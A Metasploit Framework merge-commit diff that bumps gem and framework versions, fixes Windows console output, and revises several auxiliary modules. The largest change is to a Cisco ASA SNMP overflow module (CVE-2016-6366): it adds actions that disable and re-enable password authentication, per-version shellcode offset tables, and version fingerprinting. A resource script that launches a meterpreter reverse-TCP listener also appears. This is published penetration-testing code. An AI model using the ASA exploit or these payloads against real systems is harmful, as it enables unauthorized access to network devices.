Merge upstream/master into universal handler work
commit
5e8a47ac00
|
@ -1 +1 @@
|
|||
2.3.2
|
||||
2.3.3
|
||||
|
|
|
@ -10,7 +10,7 @@ addons:
|
|||
- graphviz
|
||||
language: ruby
|
||||
rvm:
|
||||
- '2.3.2'
|
||||
- '2.3.3'
|
||||
|
||||
env:
|
||||
- RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
|
||||
|
|
48
Gemfile.lock
48
Gemfile.lock
|
@ -1,7 +1,7 @@
|
|||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (4.13.1)
|
||||
metasploit-framework (4.13.2)
|
||||
actionpack (~> 4.2.6)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -140,7 +140,7 @@ GEM
|
|||
factory_girl_rails (4.7.0)
|
||||
factory_girl (~> 4.7.0)
|
||||
railties (>= 3.0.0)
|
||||
faraday (0.9.2)
|
||||
faraday (0.10.0)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
ffi (1.9.14)
|
||||
filesize (0.1.1)
|
||||
|
@ -153,11 +153,11 @@ GEM
|
|||
loofah (2.0.3)
|
||||
nokogiri (>= 1.5.9)
|
||||
metasm (1.0.2)
|
||||
metasploit-concern (2.0.2)
|
||||
metasploit-concern (2.0.3)
|
||||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-credential (2.0.7)
|
||||
metasploit-credential (2.0.8)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
metasploit_data_models
|
||||
|
@ -165,12 +165,12 @@ GEM
|
|||
railties
|
||||
rubyntlm
|
||||
rubyzip
|
||||
metasploit-model (2.0.2)
|
||||
metasploit-model (2.0.3)
|
||||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.2.1)
|
||||
metasploit_data_models (2.0.8)
|
||||
metasploit_data_models (2.0.9)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
arel-helpers
|
||||
|
@ -196,7 +196,7 @@ GEM
|
|||
network_interface (0.0.1)
|
||||
nokogiri (1.6.8.1)
|
||||
mini_portile2 (~> 2.1.0)
|
||||
octokit (4.6.1)
|
||||
octokit (4.6.2)
|
||||
sawyer (~> 0.8.0, >= 0.5.3)
|
||||
openssl-ccm (1.2.1)
|
||||
openvas-omp (0.0.4)
|
||||
|
@ -234,7 +234,7 @@ GEM
|
|||
thor (>= 0.18.1, < 2.0)
|
||||
rake (11.3.0)
|
||||
rb-readline-r7 (0.5.2.0)
|
||||
recog (2.0.24)
|
||||
recog (2.1.0)
|
||||
nokogiri
|
||||
redcarpet (3.3.4)
|
||||
rex-arch (0.1.2)
|
||||
|
@ -245,42 +245,42 @@ GEM
|
|||
rex-core
|
||||
rex-struct2
|
||||
rex-text
|
||||
rex-core (0.1.2)
|
||||
rex-encoder (0.1.0)
|
||||
rex-core (0.1.3)
|
||||
rex-encoder (0.1.1)
|
||||
metasm
|
||||
rex-arch
|
||||
rex-text
|
||||
rex-exploitation (0.1.2)
|
||||
rex-exploitation (0.1.3)
|
||||
jsobfu
|
||||
metasm
|
||||
rex-arch
|
||||
rex-encoder
|
||||
rex-text
|
||||
rex-java (0.1.2)
|
||||
rex-java (0.1.3)
|
||||
rex-mime (0.1.1)
|
||||
rex-text
|
||||
rex-nop (0.1.0)
|
||||
rex-arch
|
||||
rex-ole (0.1.2)
|
||||
rex-ole (0.1.3)
|
||||
rex-text
|
||||
rex-powershell (0.1.66)
|
||||
rex-powershell (0.1.68)
|
||||
rex-random_identifier
|
||||
rex-text
|
||||
rex-random_identifier (0.1.0)
|
||||
rex-random_identifier (0.1.1)
|
||||
rex-text
|
||||
rex-registry (0.1.0)
|
||||
rex-rop_builder (0.1.0)
|
||||
rex-registry (0.1.1)
|
||||
rex-rop_builder (0.1.1)
|
||||
metasm
|
||||
rex-core
|
||||
rex-text
|
||||
rex-socket (0.1.1)
|
||||
rex-socket (0.1.2)
|
||||
rex-core
|
||||
rex-sslscan (0.1.0)
|
||||
rex-sslscan (0.1.1)
|
||||
rex-socket
|
||||
rex-text
|
||||
rex-struct2 (0.1.0)
|
||||
rex-text (0.2.5)
|
||||
rex-zip (0.1.0)
|
||||
rex-text (0.2.9)
|
||||
rex-zip (0.1.1)
|
||||
rex-text
|
||||
rkelly-remix (0.0.6)
|
||||
robots (0.10.1)
|
||||
|
@ -303,9 +303,9 @@ GEM
|
|||
rspec-support (3.5.0)
|
||||
rubyntlm (0.6.1)
|
||||
rubyzip (1.2.0)
|
||||
sawyer (0.8.0)
|
||||
sawyer (0.8.1)
|
||||
addressable (>= 2.3.5, < 2.6)
|
||||
faraday (~> 0.8, < 0.10)
|
||||
faraday (~> 0.8, < 1.0)
|
||||
shoulda-matchers (3.1.1)
|
||||
activesupport (>= 4.0.0)
|
||||
simplecov (0.12.0)
|
||||
|
@ -321,7 +321,7 @@ GEM
|
|||
timecop (0.8.1)
|
||||
tzinfo (1.2.2)
|
||||
thread_safe (~> 0.1)
|
||||
tzinfo-data (1.2016.9)
|
||||
tzinfo-data (1.2016.10)
|
||||
tzinfo (>= 1.0.0)
|
||||
windows_error (0.0.2)
|
||||
xpath (2.0.0)
|
||||
|
|
|
@ -30,7 +30,7 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
VERSION = "4.13.1"
|
||||
VERSION = "4.13.2"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
|
|
@ -366,7 +366,7 @@ module Exploit::Remote::HttpClient
|
|||
print_line('#' * 20)
|
||||
print_line(res.to_s)
|
||||
end
|
||||
|
||||
disconnect(c)
|
||||
res
|
||||
rescue ::Errno::EPIPE, ::Timeout::Error => e
|
||||
print_line(e.message) if datastore['HttpTrace']
|
||||
|
|
|
@ -61,7 +61,7 @@ module Msf
|
|||
# if it fails to start the listener.
|
||||
#
|
||||
def setup_handler
|
||||
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
|
||||
if !datastore['Proxies'].blank? && !datastore['ReverseAllowProxy']
|
||||
raise RuntimeError, "TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour."
|
||||
end
|
||||
|
||||
|
|
|
@ -63,7 +63,7 @@ module ReverseTcpDoubleSSL
|
|||
# if it fails to start the listener.
|
||||
#
|
||||
def setup_handler
|
||||
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
|
||||
if !datastore['Proxies'].blank? && !datastore['ReverseAllowProxy']
|
||||
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
|
||||
end
|
||||
|
||||
|
|
|
@ -43,7 +43,7 @@ module ReverseTcpSsl
|
|||
# if it fails to start the listener.
|
||||
#
|
||||
def setup_handler
|
||||
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
|
||||
if !datastore['Proxies'].blank? && !datastore['ReverseAllowProxy']
|
||||
raise RuntimeError, "TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour."
|
||||
end
|
||||
|
||||
|
|
|
@ -139,12 +139,16 @@ begin
|
|||
# for rb-readline to support setting input and output. Output needs to be set so that colorization works for the
|
||||
# prompt on Windows.
|
||||
self.prompt = prompt
|
||||
reset_sequence = "\001\r\033[K\002"
|
||||
if (/mingw/ =~ RUBY_PLATFORM)
|
||||
reset_sequence = ""
|
||||
end
|
||||
if defined? RbReadline
|
||||
RbReadline.rl_instream = fd
|
||||
RbReadline.rl_outstream = output
|
||||
|
||||
begin
|
||||
line = RbReadline.readline("\001\r\033[K\002" + prompt)
|
||||
line = RbReadline.readline(reset_sequence + prompt)
|
||||
rescue ::Exception => exception
|
||||
RbReadline.rl_cleanup_after_signal()
|
||||
RbReadline.rl_deprep_terminal()
|
||||
|
@ -158,7 +162,7 @@ begin
|
|||
|
||||
line.try(:dup)
|
||||
else
|
||||
::Readline.readline("\001\r\033[K\002" + prompt, true)
|
||||
::Readline.readline(reset_sequence + prompt, true)
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -63,12 +63,16 @@ class Output < Rex::Ui::Output
|
|||
end
|
||||
|
||||
def print_line(msg = '')
|
||||
if (/mingw/ =~ RUBY_PLATFORM)
|
||||
print(msg + "\n")
|
||||
return
|
||||
end
|
||||
print("\033[s") # Save cursor position
|
||||
print("\r\033[K" + msg + "\n")
|
||||
if input and input.prompt
|
||||
print("\r\033[K")
|
||||
print(input.prompt)
|
||||
print(input.line_buffer)
|
||||
print(input.prompt.tr("\001\002", ''))
|
||||
print(input.line_buffer.tr("\001\002", ''))
|
||||
print("\033[u\033[B") # Restore cursor, move down one line
|
||||
end
|
||||
end
|
||||
|
|
|
@ -23,6 +23,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'Nate Caroe <nate.caroe@risksense.com>',
|
||||
'Dylan Davis <dylan.davis@risksense.com>',
|
||||
'William Webb <william_webb[at]rapid7.com>', # initial module and ASA hacking notes
|
||||
'Jeff Jarmoc <jjarmoc>', # minor improvements
|
||||
'Equation Group',
|
||||
'Shadow Brokers'
|
||||
],
|
||||
|
@ -32,19 +33,29 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp'],
|
||||
[ 'URL', 'https://github.com/RiskSense-Ops/CVE-2016-6366'],
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
['PASS_DISABLE', {'Description' => 'Disable password authentication.'} ],
|
||||
['PASS_ENABLE', {'Description' => 'Enable password authentication.'} ]
|
||||
],
|
||||
'DefaultAction' => 'PASS_DISABLE'
|
||||
)
|
||||
|
||||
@offsets = version_offsets()
|
||||
|
||||
register_options([
|
||||
OptEnum.new('MODE', [ true, 'Enable or disable the password auth functions', 'pass-disable', ['pass-disable', 'pass-enable']])
|
||||
OptEnum.new('ASAVER', [ false, 'Target ASA version (default autodetect)', 'auto', ['auto']+@offsets.keys]),
|
||||
], self.class)
|
||||
|
||||
deregister_options("VERSION")
|
||||
datastore['VERSION'] = '2c' # SNMP v. 2c required it seems
|
||||
end
|
||||
|
||||
@asa_version_snmp = '1.3.6.1.2.1.47.1.1.1.1.10.1'
|
||||
|
||||
@offsets = {
|
||||
#"9.2(4)14" => ["197.207.10.8", "118.97.40.9", "72", "0.16.185.9", "112.31.185.9", "85.49.192.137", "0.80.8.8", "240.95.8.8", "85.137.229.87"],
|
||||
def version_offsets()
|
||||
# Payload offsets for supported ASA versions.
|
||||
# See https://github.com/RiskSense-Ops/CVE-2016-6366
|
||||
return {
|
||||
"9.2(4)13" => ["197.207.10.8", "70.97.40.9", "72", "0.16.185.9", "240.30.185.9", "85.49.192.137", "0.80.8.8", "240.95.8.8", "85.137.229.87"],
|
||||
"9.2(4)" => ["101.190.10.8", "54.209.39.9", "72", "0.48.184.9", "192.52.184.9", "85.49.192.137", "0.80.8.8", "0.91.8.8", "85.137.229.87"],
|
||||
"9.2(3)" => ["29.112.29.8", # jmp_esp_offset, 0
|
||||
|
@ -56,7 +67,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
"0.80.8.8", # admauth_bounds, 6
|
||||
"64.90.8.8", # admauth_offset, 7
|
||||
"85.137.229.87"], # admauth_code, 8
|
||||
|
||||
"9.2(2)8" => ["21.187.10.8", "54.245.39.9", "72", "0.240.183.9", "16.252.183.9", "85.49.192.137", "0.80.8.8", "64.90.8.8", "85.137.229.87"],
|
||||
"9.2(1)" => ["197.180.10.8", "54.118.39.9", "72", "0.240.182.9", "16.252.182.9", "85.49.192.137", "0.80.8.8", "176.84.8.8", "85.137.229.87"],
|
||||
"9.1(1)4" => ["173.250.27.8", "134.177.3.9", "72", "0.112.127.9", "176.119.127.9", "85.49.192.137", "0.48.8.8", "96.49.8.8", "85.137.229.87"],
|
||||
|
@ -90,13 +100,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
"8.0(3)" => ["141.123.131.9", "156.138.160.8", "88", "0.128.9.9", "112.130.9.9", "85.49.192.137", "0.96.6.8", "176.96.6.8", "85.137.229.87"],
|
||||
"8.0(2)" => ["155.222.211.8", "44.103.159.8", "88", "0.224.6.9", "32.237.6.9", "85.49.192.137", "0.80.6.8", "48.90.6.8", "85.137.229.87"]
|
||||
}
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
snmp = connect_snmp
|
||||
vers_string = snmp.get_value(@asa_version_snmp).to_s
|
||||
vers_string = get_asa_version()
|
||||
rescue ::Exception => e
|
||||
print_error("Error: Unable to retrieve version information")
|
||||
return Exploit::CheckCode::Unknown
|
||||
|
@ -115,11 +123,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
# adds offsets to the improved shellcode
|
||||
# https://github.com/RiskSense-Ops/CVE-2016-6366/blob/master/shellcode.nasm
|
||||
|
||||
if mode == 'pass-disable'
|
||||
if mode == 'PASS_DISABLE'
|
||||
always_return_true = "49.192.64.195"
|
||||
pmcheck_bytes = always_return_true
|
||||
admauth_bytes = always_return_true
|
||||
else
|
||||
else # PASS_ENABLE
|
||||
pmcheck_bytes = @offsets[vers_string][5]
|
||||
admauth_bytes = @offsets[vers_string][8]
|
||||
end
|
||||
|
@ -157,16 +165,13 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run()
|
||||
|
||||
begin
|
||||
mode = datastore['MODE']
|
||||
session = rand(255) + 1
|
||||
|
||||
snmp = connect_snmp
|
||||
vers_string = snmp.get_value(@asa_version_snmp).to_s
|
||||
vers_string = get_asa_version()
|
||||
|
||||
print_status("Building #{mode} payload for version #{vers_string}...")
|
||||
overflow = build_payload(vers_string, mode)
|
||||
print_status("Building #{action.name} payload for version #{vers_string}...")
|
||||
overflow = build_payload(vers_string, action.name)
|
||||
payload = SNMP::ObjectId.new(overflow)
|
||||
|
||||
print_status("Sending SNMP payload...")
|
||||
|
@ -174,8 +179,9 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
if response.varbind_list
|
||||
print_good("Clean return detected!")
|
||||
if mode == 'pass-disable'
|
||||
print_warning("Don't forget to run pass-enable after logging in!")
|
||||
if action.name == 'PASS_DISABLE'
|
||||
print_warning("Don't forget to run PASS_ENABLE after logging in!")
|
||||
print_warning(" set ACTION PASS_ENABLE")
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -196,4 +202,24 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
|
||||
def get_asa_version()
|
||||
return datastore['ASAVER'] unless (datastore['ASAVER'] == 'auto')
|
||||
vprint_status("Fingerprinting via SNMP...")
|
||||
|
||||
asa_version_oid = '1.3.6.1.2.1.47.1.1.1.1.10.1'
|
||||
mib2_sysdescr_oid = '1.3.6.1.2.1.1.1.0'
|
||||
|
||||
snmp = connect_snmp
|
||||
ver = snmp.get_value(asa_version_oid).to_s
|
||||
vprint_status("OID #{asa_version_oid} yields #{ver}")
|
||||
|
||||
if (ver == "noSuchInstance")
|
||||
# asa_version_snmp OID isn't available on some models, fallback to MIB2 SysDescr
|
||||
ver = snmp.get_value(mib2_sysdescr_oid).rpartition(' ').last
|
||||
vprint_status("OID #{mib2_sysdescr_oid} yields #{ver}")
|
||||
end
|
||||
|
||||
ver
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -61,6 +61,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'method' => 'GET'
|
||||
})
|
||||
print_good("#{rhost}:#{rport} - Server is responsive...")
|
||||
return 1
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
|
||||
return
|
||||
end
|
||||
|
|
|
@ -195,7 +195,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
if not res
|
||||
print_error("#{msg} HTTP Connection Error, Aborting")
|
||||
return :abort
|
||||
return
|
||||
end
|
||||
|
||||
if action.name != "OWA_2013" and res.get_cookies.empty?
|
||||
|
|
|
@ -60,6 +60,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
print_status("[#{target_host}] #{tpath}robots.txt found")
|
||||
print_good("Contents of Robots.txt:\n#{res.body}")
|
||||
|
||||
# short url regex
|
||||
aregex = /llow:[ ]{0,2}(.*?)$/i
|
||||
|
|
|
@ -312,7 +312,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
extra << "PasswordMin=#{domains[domain][:pass_min]} "
|
||||
extra << ")"
|
||||
end
|
||||
print_status("#{domain.upcase} [ #{users.keys.map{|k| users[k]}.join(", ")} ] #{extra}")
|
||||
print_good("#{domain.upcase} [ #{users.keys.map{|k| users[k]}.join(", ")} ] #{extra}")
|
||||
end
|
||||
|
||||
# cleanup
|
||||
|
|
|
@ -13,6 +13,10 @@ def out_path
|
|||
"#{Msf::Config::local_directory}/meterpreter_reverse_tcp.exe"
|
||||
end
|
||||
|
||||
# Please see:
|
||||
# https://github.com/rapid7/metasploit-framework/issues/7603
|
||||
sleep(1)
|
||||
|
||||
run_single("use payload/#{PAYLOAD}")
|
||||
run_single("set lhost #{payload_lhost}")
|
||||
run_single("set lport #{payload_lport}")
|
||||
|
@ -25,4 +29,4 @@ run_single("set lhost #{payload_lhost}")
|
|||
run_single("set lport #{payload_lport}")
|
||||
run_single('set exitonsession false')
|
||||
run_single('run -j')
|
||||
</ruby>
|
||||
</ruby>
|
||||
|
|
Loading…
Reference in New Issue